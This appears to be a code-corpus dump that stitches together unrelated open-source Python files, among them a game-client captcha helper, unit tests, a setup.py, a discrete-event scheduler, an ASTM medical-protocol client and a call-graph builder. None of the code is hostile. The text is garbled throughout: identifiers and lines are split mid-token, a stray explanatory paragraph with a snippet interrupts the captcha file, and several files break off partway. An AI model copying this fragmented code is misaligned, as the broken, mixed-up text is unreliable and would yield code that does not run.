lib/lacuna/captcha.py
Python
mit
5,055
0.017013
import os, requests, tempfile, time, webbrowser import lacuna.bc import lacuna.exceptions as err ### Dev notes: ### The tempfile containing the captcha image is not deleted until solveit() ### has been called. ### ### Allowing the tempfile to delete itself (delete=True during tempfile ### creation), or using the tempfile in conjunction with a 'with:' expression, ### have both been attempted. ### ### The problem is that, when using those auto-deletion methods, the tempfile ### is occasionally being removed from the system before the image viewer ### we're firing off actually gets a chance to read it. Everything is ### happening in the right order, it's just that the image viewer startup is ### too slow. ### ### Deleting the tempfile manually in solveit() works - don't decide to get ### clever and replace the unlink() in solveit() with some form of tempfile ### autodeletion without a lot of testing. class Captcha(lacuna.bc.LacunaObject): """ Fetches, displays, and solves graphical captchas. General usage will be:: cap = my_client.get_captcha() cap.showit() # display the captcha image cap.prompt_user() # ask the user for a solution cap.solveit() # check the user's solution """ path = 'captcha' @lacuna.bc.LacunaObject.call_returning_meth def fetch( self, **kwargs ): """ Fetches a captcha for the user to solve from the server. This mirrors the TLE API, but you generally don't need to call this. Returns a :class:`lacuna.captcha.Puzzle` object. """ return Puzzle( self.client, kwargs['rslt'] ) def showit( self ): """ Actually downloads the captcha image, and attempts to display it to the user in one of several browsers. If :meth:`fetch` is called first, :meth:`showit` uses that fetched data, but this is not necessary. :meth:`showit` will call fetch for you. Raises :class:`lacuna.exceptions.RequestError` if the image is not fetchable (network error or the TLE servers have gone down). Raises EnvironmentError if it cannot find an image viewer to use to display the captcha image. """ if not hasattr(self,'url') or not hasattr(self,'guid'): puzzle = self.fetch() self.url = puzzle.url self.guid = puzzle.guid img_resp = requests.get( self.url ) if img_resp.status_code != 200: raise err.RequestError("The captcha image URL is not responding.") f = tempfile.NamedTemporaryFile( suffix='.png', prefix='tle_capcha_', delete=False ); self.tempfile = f.name f.write( img_resp.content ) if hasattr(img_resp, 'connection'): img_resp.connection.close() local_url = 'file://' + f.name found_browser = False for b in [ None, 'windows-default', 'macosx', 'safari', 'firefox', 'google-chrome', 'chrome', 'chromium-browser', 'chromium' ]: try: browser = webbrowser.get( b ) browser.open( local_url, 0, True ) found_browser = True break except webbrowser.Error as e: pass if not found_browser
: raise EnvironmentError("Unable to find a browser to show the captcha image. Captcha solution is required.") def prompt_user(self): """ Prompts the user to solve the displayed captcha. It's not illegal to call this without first calling :meth:`showit`, but doing so makes no sense. """
self.resp = input("Enter the solution to the captcha here: ") return self.resp def solveit(self): """ Sends the user's response to the server to check for accuracy. Returns True if the user's response was correct. Raises :class:`lacuna.exceptions.CaptchaResponseError` otherwise. """ if not hasattr(self,'resp'): raise AttributeError("You must prompt the user for a response before calling solveit().") try: self.solve( self.guid, self.resp ) except err.ServerError as e: raise err.CaptchaResponseError("Incorrect captcha response") finally: delattr( self, 'url' ) delattr( self, 'guid' ) delattr( self, 'resp' ) if os.path.isfile(self.tempfile): os.unlink( self.tempfile ) return True @lacuna.bc.LacunaObject.call_member_meth def solve( self, guid:str, solution:str, **kwargs ): """ Mirrors the TLE Captcha module's :meth:`solve` method, but unless you really need this and you really know why, use :meth:`solveit` instead. """ pass class Puzzle(lacuna.bc.SubClass): """ Object Attributes:: url FQ URL to the puzzle image guid uuid attached to the puzzle; must be passed back along with the solution. """
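The dev notes above argue for `delete=False` plus a manual unlink, since auto-deletion can race a slow image viewer; the pattern reduced to its core (the image bytes are placeholders):

import os
import tempfile

f = tempfile.NamedTemporaryFile(suffix='.png', prefix='tle_captcha_', delete=False)
f.write(b'...image bytes...')
f.close()
# ... hand f.name to the viewer; delete only once the consumer is done ...
if os.path.isfile(f.name):
    os.unlink(f.name)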
Teino1978-Corp/pre-commit
tests/commands/clean_test.py
Python
mit
711
0
from __future__ import unicode_literals import os.path from pre_commit.commands.clean import clean from pre_commit.util import rmtree def test_clean(runner_with_mocked_store): assert os.path.exists(runner_with_mocked_store.store.directory) clean(runner_with_mocked_store) assert not os.path.exists(runner_with_mocked_store.store.directory) def test_clean_empty(runner_with_mocked_store): """Make sure clean succeeds when the directory doesn
't exist.""" rmtree(runner_with_mocked_store.store.directory) assert not os.p
ath.exists(runner_with_mocked_store.store.directory) clean(runner_with_mocked_store) assert not os.path.exists(runner_with_mocked_store.store.directory)
benpicco/mate-deskbar-applet
deskbar/interfaces/Controller.py
Python
gpl-2.0
1,455
0.010309
class Controller(object): def __init__(self, model): self._model = model self._view = None def register_view(self, view): self._view = view def on_quit(self, *args): raise NotImplementedError def on_keybinding_activated(self, core, time): raise NotImplementedError def on_show_about(self, sender): raise NotImplementedError def on_toggle_history(self, sender): raise NotImplementedError def on_show_preferences(self, sen
der): raise NotImplementedError def on_query_entry_changed(self, entry): raise NotImplementedError def on_query_entry_key_press_event(self, entry, event): raise NotImplementedError def on_query_entry_activate(self, entry): raise NotImplementedError def on_treeview_cursor_changed(self, treeview): raise NotImplementedError def on_match_selected(self,
treeview, text, match_obj, event): raise NotImplementedError def on_do_default_action(self, treeview, text, match_obj, event): raise NotImplementedError def on_action_selected(self, treeview, text, action, event): raise NotImplementedError def on_clear_history(self, sender): raise NotImplementedError def on_history_match_selected(self, history, text, match): raise NotImplementedError
NejcZupec/ggrc-core
test/integration/ggrc/converters/test_import_delete.py
Python
apache-2.0
744
0.002688
# Copyright (C) 2016 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
from ggrc.converters import errors
from integration.ggrc import converters class TestBasicCsvImport(converters.TestCase): def setUp(self): converters.TestCase.setUp(self) self.client.get("/login") def test_policy_basic_import(self): filename = "ca_setup_for_deletion.csv" self.import_file(filename) filename = "ca_deletion.csv" response_data_dry = self.import_file(filename, dry_run=True) response_data = self.import_file(filename) self.assertEqual(response_data_dry, response_data) self.assertEqual(response_data[0]["deleted"], 2) self.assertEqual(response_data[0]["ignored"], 0)
chriswmackey/UWG_Python
setup.py
Python
gpl-3.0
1,278
0.000782
import setuptools with open("README.md", "r") as fh: long_description = fh.read() with open('requirements.txt') as f: requirements = f.read().splitlines() with open('cli-requirements.txt') as f: cli_requirements = f.read().splitlines() setuptools.setup( name="uwg", use_scm_version=True, setup_requires=['setuptools_scm'], author="Ladybug Tools", author_email="info@ladybug.tools", description="Python application for modeling the urban heat island effect.", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/ladybug-tools/uwg", packages=setuptools.find_packages(exclude=["tests*", "resources*"]), include_package_data=True, install_requires=requirements, extras_require={ 'cli': cli_requirements }, entry_points={ "console_scripts": ["uwg = uwg.cli:main"] }, classifiers=[ "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3.
6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: Implementation :: CPython", "License :: OSI Approved :: GNU General Public License v3 (GPLv3)", "Operating Sy
stem :: OS Independent" ], )
Rosslaew/OptiGear
gear/gear.py
Python
mit
2,681
0.012309
from collections import UserList from gear import ffxiv, xivdb from gear import power as p """Class representing a simple gear element. """ class Gear(object): """Gear(slot, item_id, **attributes) slot : in which slot of the gearset is this precise gear, as defined in ffxiv.slots. item_id : identifier from xivdb.com. Will load the gear from there if provided attributes : the attributes of the gear as defined in ffxiv.attributes. """ def __init__(self, slot, item_id = None, **attributes): if item_id is not None : attributes = xivdb.getId(item_id) assert(slot in ffxiv.slots) self.slot = slot # We filter out what is not a legitimate FFXIV attribute self.attributes = dict(filter( lambda a:a[0] in ffxiv.attributes, attributes.items())) # We put the rest in self.misc self.misc = dict(filter( lambda a:a[0] not in ffxiv.attributes, attributes.items())) """Class representing a complete gear set. Can be called by specifying the Lodestone ID for the character or by specifying the gear for each gear slot, as defined in ffxiv.slots. """ class GearSet(Gear): """GearSet(character_id, **gears) character_id : provide to load gearset from Lodestone. gears : pairs slot=Gear """ def __init__(self, character_id=None, **gears ): self.gears = {} # If we do not fetch the gearset from Lodestone if character_id is None: for s in ffxiv.slots: g = gears.get(s) assert(g is None or g.slot == s) self.gear[s] = g else: pass #TODO add fetching gearset from Lodestone # A GearSet is treated as a Gear, so we update the attributes attributes = { k : sum( [g.attributes.get(k,0) for g in self.gears.values() if g is not None ], start=0) for k in ffxiv.attributes} super().__init__(None,*attributes) """List of GearSets to compare. """ class GearSetList(UserList): """GearSetList(data) data : an iterable of gearsets
""" def __init__(self, data=[]): super().__init__(data) """maxPower(job,consraintList) Returns the best gearset for job given a list of constraints. """ def maxPower(self,job, constraintList=None): pass """Function to calculate the power of a gear for job. """ def power(gear, job): return sum([i
nt(gear.attributes.get(k,0))*v for k,v in ffxiv.weights[job].items()])
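The `power` helper is a plain weighted sum over attributes; with hypothetical weights and attribute values the arithmetic is easy to check by hand:

weights = {'crit': 0.22, 'det': 0.14}   # stand-in for ffxiv.weights[job]
attrs = {'crit': 120, 'det': 90}        # stand-in for gear.attributes
value = sum(int(attrs.get(k, 0)) * v for k, v in weights.items())
# 120 * 0.22 + 90 * 0.14 == 39.0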
ChristosChristofidis/h2o-3
h2o-py/tests/testdir_munging/binop/pyunit_binop2_plus.py
Python
apache-2.0
3,072
0.008138
import sys sys.path.insert(1, "../../../") import h2o def binop_plus(ip,port): # Connect to h2o h2o.init(ip,port) iris = h2o.import_frame(path=h2o.locate("smalldata/iris/iris_wheader_65_rows.csv")) rows, cols = iris.dim() iris.show() ################################################################### # LHS: scaler, RHS: H2OFrame res = 2 + iris res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == cols, "dimension mismatch" for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]): assert abs(x - y) < 1e-1, "expected same values" # LHS: scaler, RHS: scaler res = 2 + iris[0] res2 = 1.1 + res[21,:] assert abs(res2 - 8.2) < 1e-1, "expected same values" ################################################################### # LHS: scaler, RHS: H2OFrame res = 1.2 + iris[2] res2 = res[21,:] + iris res2.show() # LHS: scaler, RHS: H2OVec res = 1.2 + iris[2] res2 = res[21,:] + iris[1] res2.show() # LHS: scaler, RHS: scaler res = 1.1 + iris[2] res2 = res[21,:] + res[10,:] assert abs(res2 - 5.2) < 1e-1, "expected same values" # LHS: scaler, RHS: scaler res = 2 + iris[0] res2 = res[21,:] + 3 assert abs(res2 - 10.1) < 1e-1, "expected same values" ################################################################### # LHS: H2OVec, RHS: H2OFrame #try: # res = iris[2] + iris # res.show() # assert False, "expected error. objects with different dimensions not supported." #except EnvironmentError: # pass # LHS: H2OVec, RHS: scaler res = 1.2 + iris[2] res2 = iris[1] + res[21,:] res2.show() ################################################################### # LHS: H2OFrame, RHS: H2OFrame res = iris + iris res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == cols, "dimension mismatch" res = iris[0:2] + iris[1:3] res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == 2, "dimension mismatch" #try: # res = iris + iris[0:3] # res.show() # assert False, "expected error. frames are different dimensions." #except EnvironmentError: # pass # LHS: H2OFrame, RHS: H2OVec #try: # res = iris + iris[0] #
res.show() # assert False, "expected error. objects of different dimensions not supported." #except EnvironmentError: # pass # LHS: H2OFrame, RHS: scaler res = 1.2 + iris[2] res2 = iris + res[21,:] res2.show() # LHS: H2OFrame, RHS: scaler res = iris + 2 res_rows, res_cols = res.dim() assert res_rows
== rows and res_cols == cols, "dimension mismatch" for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]): assert abs(x - y) < 1e-1, "expected same values" ################################################################### if __name__ == "__main__": h2o.run_test(sys.argv, binop_plus)
py-in-the-sky/challenges
codility/equi_leader.py
Python
mit
707
0.007072
""" https://codility.com/programmers/task/equi_leader/ """ from collections import Counter, defaultdict def solution(A): def _is_
equi_leader(i): prefix_count_top = running_counts[top] suffix_count_top = total_counts[top] - prefix_count_top return (prefix_count_top * 2 > i + 1) and (suffix_count_top * 2 > len(A) - i - 1) total_counts = Counter(A) running_counts = defaultdict(int) top = A[0] result = 0
for i in xrange(len(A) - 1): n = A[i] running_counts[n] += 1 top = top if running_counts[top] >= running_counts[n] else n if _is_equi_leader(i): result += 1 return result
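A worked check against the classic Codility example: for A = [4, 3, 4, 4, 4, 2] the splits after indices 0 and 2 each leave 4 as the leader of both halves, so the answer is 2:

assert solution([4, 3, 4, 4, 4, 2]) == 2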
kdheepak89/pypdevs
pypdevs/schedulers/schedulerNA.py
Python
apache-2.0
7,125
0.002947
# Copyright 2014 Modelling, Simulation and Design Lab (MSDL) at # McGill University and the University of Antwerp (http://msdl.cs.mcgill.ca/) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ The No Age scheduler is based on the Heapset scheduler, though it does not take age into account. .. warning:: This scheduler does not take the age into account, making it **unusable** in simulations where the *timeAdvance* function can return (exactly) 0. If unsure, do **not** use this scheduler, but the more general Heapset scheduler. The heap will contain only the timestamps of events that should happen. One of the dictionaries will contain the actual models that transition at the specified time. The second dictionary than contains a reverse relation: it maps the models to their time_next. This reverse relation is necessary to know the *old* time_next value of the model. Because as soon as the model has its time_next changed, its previously scheduled time will be unknown. This 'previous time' is **not** equal to the *timeLast*, as it might be possible that the models wait time was interrupted. For a schedule, the model is added to the dictionary at the specified time_next. In case it is the first element at this location in the dictionary, we also add the timestamp to the heap. This way, the heap only contains *unique* timestamps and thus the actual complexity is reduced to the number of *different* timestamps. Furthermore, the reverse relation is also updated. Unscheduling is done similarly by simply removing the element from the dictionary. Rescheduling is a slight optimisation of unscheduling, followed by scheduling. This scheduler does still schedule models that are inactive (their time_next is infinity), though this does not influence the complexity. The complexity is not affected due to infinity being a single element in the heap that is always present. Since a heap has O(log(n)) complexity, this one additional element does not have a serious impact. The main advantage over the Activity Heap is that it never gets dirty and thus doesn't require periodical cleanup. The only part that gets dirty is the actual heap, which only con
tains small tuples. Duplicates of these will also be reduced to a single element, thus memory consu
mption should not be a problem in most cases. This scheduler is ideal in situations where most transitions happen at exactly the same time, as we can then profit from the internal structure and simply return the mapped elements. It results in sufficient efficiency in most other cases, mainly due to the code base being a lot smaller then the Activity Heap. """ from heapq import heappush, heappop from pypdevs.logger import * class SchedulerNA(object): """ Scheduler class itself """ def __init__(self, models, epsilon, total_models): """ Constructor :param models: all models in the simulation """ self.heap = [] self.reverse = [None] * total_models self.mapped = {} self.infinite = float('inf') # Init the basic 'inactive' entry here, to prevent scheduling in the heap itself self.mapped[self.infinite] = set() self.epsilon = epsilon for m in models: self.schedule(m) def schedule(self, model): """ Schedule a model :param model: the model to schedule """ try: self.mapped[model.time_next[0]].add(model) except KeyError: self.mapped[model.time_next[0]] = set([model]) heappush(self.heap, model.time_next[0]) try: self.reverse[model.model_id] = model.time_next[0] except IndexError: self.reverse.append(model.time_next[0]) def unschedule(self, model): """ Unschedule a model :param model: model to unschedule """ try: self.mapped[self.reverse[model.model_id]].remove(model) except KeyError: pass self.reverse[model.model_id] = None def massReschedule(self, reschedule_set): """ Reschedule all models provided. Equivalent to calling unschedule(model); schedule(model) on every element in the iterable. :param reschedule_set: iterable containing all models to reschedule """ #NOTE the usage of exceptions is a lot better for the PyPy JIT and nets a noticable speedup # as the JIT generates guard statements for an 'if' for model in reschedule_set: model_id = model.model_id try: self.mapped[self.reverse[model_id]].remove(model) except KeyError: # Element simply not present, so don't need to unschedule it pass self.reverse[model_id] = tn = model.time_next[0] try: self.mapped[tn].add(model) except KeyError: # Create a tuple with a single entry and use it to initialize the mapped entry self.mapped[tn] = set((model, )) heappush(self.heap, tn) def readFirst(self): """ Returns the time of the first model that has to transition :returns: timestamp of the first model """ first = self.heap[0] while len(self.mapped[first]) == 0: del self.mapped[first] heappop(self.heap) first = self.heap[0] # The age was stripped of return (first, 1) def getImminent(self, time): """ Returns a list of all models that transition at the provided time, with the specified epsilon deviation allowed. :param time: timestamp to check for models .. warning:: For efficiency, this method only checks the **first** elements, so trying to invoke this function with a timestamp higher than the value provided with the *readFirst* method, will **always** return an empty set. """ t, age = time imm_children = set() try: first = self.heap[0] if (abs(first - t) < self.epsilon): #NOTE this would change the original set, though this doesn't matter as it is no longer used imm_children = self.mapped.pop(first) heappop(self.heap) first = self.heap[0] while (abs(first - t) < self.epsilon): imm_children |= self.mapped.pop(first) heappop(self.heap) first = self.heap[0] except IndexError: pass return imm_children
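The docstring's core idea, isolated as a sketch: the heap holds each distinct timestamp at most once, a dict maps timestamps to the set of models due then, and emptied sets are lazily skipped when reading the front:

from heapq import heappush, heappop

heap, mapped = [], {}

def schedule(model, t):
    if t not in mapped:          # push each distinct timestamp only once
        mapped[t] = set()
        heappush(heap, t)
    mapped[t].add(model)

def unschedule(model, t):
    mapped[t].discard(model)     # the timestamp may linger in the heap, emptied

def pop_imminent():
    while not mapped[heap[0]]:   # lazily drop timestamps emptied above
        del mapped[heappop(heap)]
    return mapped.pop(heappop(heap))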
WesleyyC/Restaurant-Revenue-Prediction
Ari/needs_work/GridSearch.py
Python
mit
1,295
0.018533
# Grid Search for Algorithm Tuning import numpy as np import pandas as pd from math import sqrt from sklearn import datasets from sklearn.linear_model import Ridge from sklearn.grid_search import GridSearchCV ### Plotting function ### from matplotlib import pyplot as plt from sklearn.metrics import r2_score, mean_squared_error def plot_r2(y, y_pred, title): plt.figure(figsize=(10, 6)) plt.grid() plt.scatter(y, y_pred, marker='.') plt.xlabel("Actual Target"); plt.ylabel("Predicted Target") plt.title(title) xmn, xmx = plt.xlim() ymn, ymx = plt.ylim() mx = max(xmx, ymx) buff = mx * .1 plt.text(xmn + buff, mx - buff, "R2 Score: %f" % (r2_score(y, y_pred), ), size=15) plt.plot([0., mx], [0., mx]) plt.xlim(xmn, mx) plt.ylim(ymn, mx) ### Preprocessing ### dataset = pd.read_csv("train.csv") dataset.head() feats = dataset.drop("revenue", axis=1) X = feats.values #features y = dataset["revenue"].values #target # prepare a range of alpha values to test alphas = np.array([1,0.1,0.01,0.001,0.0001,0]) # create and fit a ridge regression model, testing each alpha model = Ridge() grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas)) grid.fit(X, y) # predict with the best estimator found by the grid search y_pred = grid.predict(X) print r2_score(y, y_pred) rm
se = sqrt
(mean_squared_error(y, y_pred)) print rmse
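After fitting, GridSearchCV exposes the winning configuration directly; these attributes are standard sklearn API, and the printed values depend on the data:

print grid.best_params_   # e.g. {'alpha': 1.0}
print grid.best_score_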
msosvi/flask-pyco
flask_pyco/__init__.py
Python
bsd-3-clause
23
0
from
.site
import Site
eddiep1101/python-astm
build/lib/astm/client.py
Python
bsd-3-clause
12,288
0.000488
# -*- coding: utf-8 -*- # # Copyright (C) 2013 Alexander Shorin # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. # import logging import socket from .asynclib import loop from .codec import encode from .constants import ENQ, EOT from .exceptions import NotAccepted from .mapping import Record from .protocol import ASTMProtocol log = logging.getLogger(__name__) __all__ = ['Client', 'Emitter'] class RecordsStateMachine(object): """Simple state machine to track emitting ASTM records in right order. :param mapping: Mapping of the ASTM records flow order. Keys should be string and defines record type, while values expected as sequence of other record types that may be used after current one. For example: ``{"H": ["P", "C", "L"]}`` mapping defines that if previous record had ``"H"`` type, then the next one should have ``"P"``, ``"C"`` or ``"L"`` type or :exc:`AssertionError` will be raised. The default mapping reflects common ASTM records flow rules. If this argument specified as :const:`None` no rules will be applied. :type: dict """ def __init__(self, mapping): self.mapping = mapping self.state = None def __call__(self, state): if state is not None: assert self.is_acceptable(state),\ 'invalid state %r, expected one of: %r' \ % (state, self.mapping[self.state]) self.state = state def is_acceptable(self, state): if self.mapping is None: return True if state not in self.mapping: return False next_types = self.mapping[self.state] return '*' in next_types or state in next_types DEFAULT_RECORDS_FLOW_MAP = { None: ['H'], 'H': ['C', 'M', 'P', 'Q', 'L'], 'P': ['C', 'M', 'O', 'L'], 'Q': ['C', 'M', 'O', 'L'], 'O': ['C', 'M', 'P', 'O', 'R', 'L'], 'R': ['C', 'M', 'P', 'O', 'R', 'S', 'L'], 'S': ['C', 'M', 'P', 'O', 'R', 'S', 'L'], 'C': ['*'], 'M': ['*'], 'L': ['H'] } class Emitter(object): """ASTM records emitter for :class:`Client`. Used as wrapper for user provided one to provide proper routines around for sending Header and Terminator records. :param emitter: Generator/coroutine. :param encoding: Data encoding. :type encoding: str :param flow_map: Records flow map. Used by :class:`RecordsStateMachine`. :type: dict :param chunk_size: Chunk size in bytes. If :const:`None`, emitter record wouldn't be split into chunks. :type chunk_size: int :param bulk_mode: Sends all records for single session (starts from Header and ends with Terminator records) via single message instead of sending each record separately. If result message is too long, it may be split by chunks if `chunk_size` is not :const:`None`. Keep in mind, that collecting all records for single session may take some time and server may reject data by timeout reason. :type bulk_mode: bool """ #: Records state machine controls emitting records in right order. It #: receives `records_flow_map` as only argument on Emitter initialization. 
state_machine = RecordsStateMachine def __init__(self, emitter, flow_map, encoding, chunk_size=None, bulk_mode=False): self._emitter = emitter() self._is_active = False self.encoding = encoding self.records_sm = self.state_machine(flow_map) # flag to signal that user's emitter produces no records self.empty = False # last sent sequence number self.last_seq = 0 self.buffer = [] self.chunk_size = chunk_size self.bulk_mode = bulk_mode def _get_record(self, value=None): record = self._emitter.send(value if self._is_active else None) if not self._is_active: self._is_active = True if isinstance(record, Record): record = record.to_astm() try: self.records_sm(record[0]) except Exception as err: self.throw(type(err), err.args) return record def _send_record(self, record): i
f self.bulk_mode: records = [record] while True: record = self._get_record(True) records.append(record) if record[0] == 'L': break chunks = encode(records, self.encoding, self.chunk_size) else:
self.last_seq += 1 chunks = encode([record], self.encoding, self.chunk_size, self.last_seq) self.buffer.extend(chunks) data = self.buffer.pop(0) self.last_seq += len(self.buffer) if record[0] == 'L': self.last_seq = 0 self.buffer.append(EOT) return data def send(self, value=None): """Passes `value` to the emitter. Semantically acts in same way as :meth:`send` for generators. If the emitter has any value within local `buffer` the returned value will be extracted from it unless `value` is :const:`False`. :param value: Callback value. :const:`True` indicates that previous record was successfully received and accepted by server, :const:`False` signs about his rejection. :type value: bool :return: Next record data to send to server. :rtype: bytes """ if self.buffer and value: return self.buffer.pop(0) record = self._get_record(value) return self._send_record(record) def throw(self, exc_type, exc_val=None, exc_tb=None): """Raises exception inside the emitter. Acts in same way as :meth:`throw` for generators. If the emitter had catch an exception and return any record value, it will be proceeded in common way. """ record = self._emitter.throw(exc_type, exc_val, exc_tb) if record is not None: return self._send_record(record) def close(self): """Closes the emitter. Acts in same way as :meth:`close` for generators. """ self._emitter.close() class Client(ASTMProtocol): """Common ASTM client implementation. :param emitter: Generator function that will produce ASTM records. :type emitter: function :param host: Server IP address or hostname. :type host: str :param port: Server port number. :type port: int :param timeout: Time to wait for response from server. If response wasn't received, the :meth:`on_timeout` will be called. If :const:`None` this timer will be disabled. :type timeout: int :param flow_map: Records flow map. Used by :class:`RecordsStateMachine`. :type: dict :param chunk_size: Chunk size in bytes. :const:`None` value prevents records chunking. :type chunk_size: int :param bulk_mode: Sends all records for single session (starts from Header and ends with Terminator records) via single message instead of sending each record separately. If result message is too long, it may be split by chunks if `chunk_size` is not :const:`None`. Keep in mind, that collecting all records for single session may take some time and server may reject data by timeout reason. :type bulk_mode: bool Base `emitter` is a generator that yield ASTM records one by one preserving their order:: from astm.records import ( HeaderRecord, PatientRecord, OrderRecord, TerminatorRecord ) def emitter(): assert (yie
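The flow-map contract enforced by RecordsStateMachine can be exercised without the astm package at all. A minimal standalone sketch with a deliberately reduced flow map (the real DEFAULT_RECORDS_FLOW_MAP above is richer):

# Standalone sketch of the flow-map check, mirroring RecordsStateMachine.
flow_map = {None: ['H'], 'H': ['P', 'L'], 'P': ['O', 'L'],
            'O': ['R', 'L'], 'R': ['R', 'L'], 'L': ['H']}

state = None
for record_type in ['H', 'P', 'O', 'R', 'R', 'L']:
    allowed = flow_map[state]
    assert '*' in allowed or record_type in allowed, \
        'invalid state %r, expected one of: %r' % (record_type, allowed)
    state = record_type
print('record sequence accepted')
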
burlog/py-static-callgraph
callgraph/builder.py
Python
mit
5,632
0.002308
# -*- coding: utf-8 -*- # # LICENCE MIT # # DESCRIPTION Callgraph builder. # # AUTHOR Michal Bukovsky <michal.bukovsky@trilogic.cz> # from operator import attrgetter from inspect import signature from callgraph.hooks import Hooks from callgraph.utils import AuPair from callgraph.symbols import Symbol, UnarySymbol from callgraph.symbols import IterableConstantSymbol, MappingConstantSymbol from callgraph.nodes import make_node from callgraph.indent_printer import IndentPrinter, NonePrinter, dump_tree # TODO(burlog): hooks as callbacks # TODO(burlog): properties tests # TODO(burlog): process signature? are defs invoked during import? # TODO(burlog): tests for global variables # TODO(burlog): __getattr__, __getattribute__ overrides will be problem # TODO(burlog): make result of list(), tuple(), dict(), ... iterable class CallGraphBuilder(object): def __init__(self, global_variables={}, silent=False): self.printer = NonePrinter() if silent else IndentPrinter() self.global_symbols = self.make_kwargs_symbols(global_variables) self.hooks = Hooks(self) self.current_lineno = 0 self.tot = None def print_banner(self, printer, node): extra = "<" + node.qualname + "> " if node.qualname != node.name else "" printer("@ Analyzing: {0} {1}at {2}:{3}"\ .format(node.ast.name, extra, node.filename, node.lineno)) def set_current_lineno(self, printer, expr_lineno): lineno = self.tot.lineno + expr_lineno if lineno == self.current_lineno: return self.current_lineno = lineno printer("+ line at {0}:{1}".format(self.tot.filename, lineno)) printer("+", self.tot.source_line(expr_lineno).strip()) def make_kwargs_symbols(self, kwargs): return dict((k, UnarySymbol(self, k, v)) for k, v in kwargs.items()) def build(self, function, kwargs={}): self.root = None self.hooks.clear() symbol = UnarySymbol(self, function.__name__, function) return self.process(symbol, kwargs=self.make_kwargs_symbols(kwargs)) def process(self, symbol, parent=None, args=[], kwargs={}): # attach new node to parent list node = make_node(symbol) with AuPair(self, node): if parent: where = parent.filename, self.current_lineno if not parent.attach(node, where): return node # builtins or c/c++ objects have no code if node.is_opaque: return node if not symbol.iscallable(): return node # print nice banner self.print_banner(self.pri
nter, node) # magic follows with self.printer as printer: self.inject_arguments(printer, node, args, kwargs) self.process_function(printer, node, args, kwargs) return node def process_function(self, printer, node, args, kwargs): for expr in node.ast.body: for callee, args, kwargs in expr.evaluate(printer, node.symbol):
self.process(callee, node, args.copy(), kwargs.copy()) def inject_arguments(self, printer, node, args, kwargs): sig = signature(node.symbol.value) self.inject_self(printer, node, sig, args, kwargs) bound = sig.bind_partial(*args, **self.polish_kwargs(sig, kwargs)) self.inject_defaults(printer, node, sig, bound) for name, value in bound.arguments.items(): value_symbol = self.as_symbol(value) printer("% Binding argument:", name + "=" + str(value_symbol)) node.symbol.set(name, value_symbol) def polish_kwargs(self, sig, kwargs): for param in sig.parameters.values(): if param.kind == param.VAR_KEYWORD: return kwargs return dict(self.iter_kwargs(sig, kwargs)) def iter_kwargs(self, sig, kwargs): for param in sig.parameters.values(): if param.kind == param.POSITIONAL_OR_KEYWORD: if param.name in kwargs: yield param.name, kwargs[param.name] def inject_self(self, printer, node, sig, args, kwargs): if node.symbol.myself and sig.parameters: # TODO(burlog): better bound method detection if next(iter(sig.parameters.keys())) == "self": args.insert(0, node.symbol.myself) else: # TODO(burlog): improve detection logic kwargs["self"] = node.symbol.myself def inject_defaults(self, printer, node, sig, bound): for param in sig.parameters.values(): if param.name not in bound.arguments: if param.default is not param.empty: symbol = UnarySymbol(self, param.name, param.default) bound.arguments[param.name] = symbol def as_symbol(self, value): if isinstance(value, Symbol): return value elif isinstance(value, (tuple, list)): return IterableConstantSymbol(self, tuple, value) elif isinstance(value, dict): values = list(value.values()) keys = list(UnarySymbol(self, "str", k) for k in value.keys()) return MappingConstantSymbol(self, dict, keys, values) raise RuntimeError("Can't convert value to symbol: " + str(value)) # dogfooding build function if __name__ == "__main__": builder = CallGraphBuilder() kwargs = {"self": CallGraphBuilder, "function": CallGraphBuilder.build} root = builder.build(CallGraphBuilder.build, kwargs) print(80 * "=") dump_tree(root, lambda x: x.children)
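inject_arguments and inject_defaults above lean on the standard inspect module: bind the known arguments partially, then back-fill declared defaults. A small self-contained sketch of that stdlib pattern (the function f is a made-up example):

# Bind known arguments partially, then fill in defaults, as inject_defaults does.
from inspect import signature

def f(a, b=2, *, c=3):
    return a + b + c

sig = signature(f)
bound = sig.bind_partial(1)          # only 'a' is supplied up front
for param in sig.parameters.values():
    if param.name not in bound.arguments and param.default is not param.empty:
        bound.arguments[param.name] = param.default

print(bound.arguments)                  # {'a': 1, 'b': 2, 'c': 3}
print(f(*bound.args, **bound.kwargs))   # 6
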
formiano/enigma2
lib/python/Screens/InfoBar.py
Python
gpl-2.0
33,112
0.029899
from Tools.Profile import profile from Tools.BoundFunction import boundFunction # workaround for required config entry dependencies. import Screens.MovieSelection from Components.PluginComponent import plugins from Plugins.Plugin import PluginDescriptor from Screens.Screen import Screen from Screens.MessageBox import MessageBox from Components.Label import Label from Components.Pixmap import MultiPixmap from Tools.Directories import fileExists profile("LOAD:enigma") import enigma import os from boxbranding import getBoxType, getMachineBrand, getBrandOEM, getMachineBuild, getMachineName boxtype = getBoxType() profile("LOAD:InfoBarGenerics") from Screens.InfoBarGenerics import InfoBarShowHide, \ InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarRdsDecoder, InfoBarRedButton, InfoBarTimerButton, InfoBarVmodeButton, \ InfoBarEPG, InfoBarSeek, InfoBarInstantRecord, InfoBarResolutionSelection, InfoBarAspectSelection, \ InfoBarAudioSelection, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection, \ InfoBarSubserviceSelection, InfoBarShowMovies, \ InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, InfoBarSimpleEventView, InfoBarBuffer, \ InfoBarSummarySupport, 